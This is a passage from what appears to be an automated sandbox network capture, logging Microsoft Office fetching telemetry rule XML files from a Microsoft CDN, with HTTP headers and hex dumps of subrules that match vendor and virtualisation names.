2024-10-30 02:55:50 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session IDSource IPSource PortDestination IPDestination Port
66192.168.2.55257413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:50 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:50 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:50 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91EAD002"
x-ms-request-id: 933aac65-d01e-007a-51aa-26f38c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025550Z-16849878b7867ttgfbpnfxt44s000000078g00000000gmpn
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
67192.168.2.55257513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:50 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:50 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:50 GMT
Content-Type: text/xml
Content-Length: 432
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
ETag: "0x8DC582BAABA2A10"
x-ms-request-id: e65a25e2-e01e-00aa-5b74-2aceda000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025550Z-15b8d89586fnsf5zkvx8tfb0zc00000002pg000000001z69
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:50 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


Session IDSource IPSource PortDestination IPDestination Port
68192.168.2.55257613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:50 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:50 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:50 GMT
Content-Type: text/xml
Content-Length: 475
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA740822"
x-ms-request-id: cce6b4d6-601e-000d-171c-292618000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025550Z-r197bdfb6b4bq7nf8dgr5rzeq400000002p000000000cqte
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:50 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
69192.168.2.55257713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:50 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:50 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:50 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
ETag: "0x8DC582BB464F255"
x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025550Z-16849878b78wv88bk51myq5vxc00000007pg00000000gnkd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
70192.168.2.55257813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:51 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:51 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:51 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA4037B0D"
x-ms-request-id: 6c7ab4fb-501e-0078-78bf-2706cf000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025551Z-17c5cb586f6wmhkn5q6fu8c5ss00000006vg000000006t1x
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
71192.168.2.55257913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:51 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:51 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:51 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
ETag: "0x8DC582BA6CF78C8"
x-ms-request-id: 44c43cee-601e-003e-459c-273248000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025551Z-15b8d89586fzhrwgk23ex2bvhw0000000ab000000000ap6t
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
72192.168.2.55258013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:51 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:51 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:51 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B984BF177"
x-ms-request-id: f6a2cc2d-401e-0015-3796-250e8d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025551Z-16849878b78fssff8btnns3b1400000007u0000000000q9p
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
73192.168.2.55258113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:51 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:51 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:51 GMT
Content-Type: text/xml
Content-Length: 405
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
ETag: "0x8DC582B942B6AFF"
x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025551Z-16849878b78j7llf5vkyvvcehs00000008k0000000006q1w
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:51 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


Session IDSource IPSource PortDestination IPDestination Port
74192.168.2.55258213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:51 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:51 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:51 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA642BF4"
x-ms-request-id: af2b1dc9-001e-0066-0d6c-27561e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025551Z-16849878b785jrf8dn0d2rczaw00000008k000000000fb4e
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:51 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
75192.168.2.55258313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:52 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:52 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:52 GMT
Content-Type: text/xml
Content-Length: 174
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91D80E15"
x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025552Z-16849878b787bfsh7zgp804my400000006ag0000000001mx
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:52 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


Session IDSource IPSource PortDestination IPDestination Port
76192.168.2.55258513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:52 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:52 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:52 GMT
Content-Type: text/xml
Content-Length: 958
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
ETag: "0x8DC582BA0A31B3B"
x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025552Z-16849878b782d4lwcu6h6gmxnw00000006z000000000wf8b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:52 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


Session IDSource IPSource PortDestination IPDestination Port
77192.168.2.55258413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:52 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:52 GMT
Content-Type: text/xml
Content-Length: 1952
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
ETag: "0x8DC582B956B0F3D"
x-ms-request-id: 24a38757-d01e-0065-3665-29b77a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025552Z-r197bdfb6b4bs5qf58wn14wgm000000006n00000000011g9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
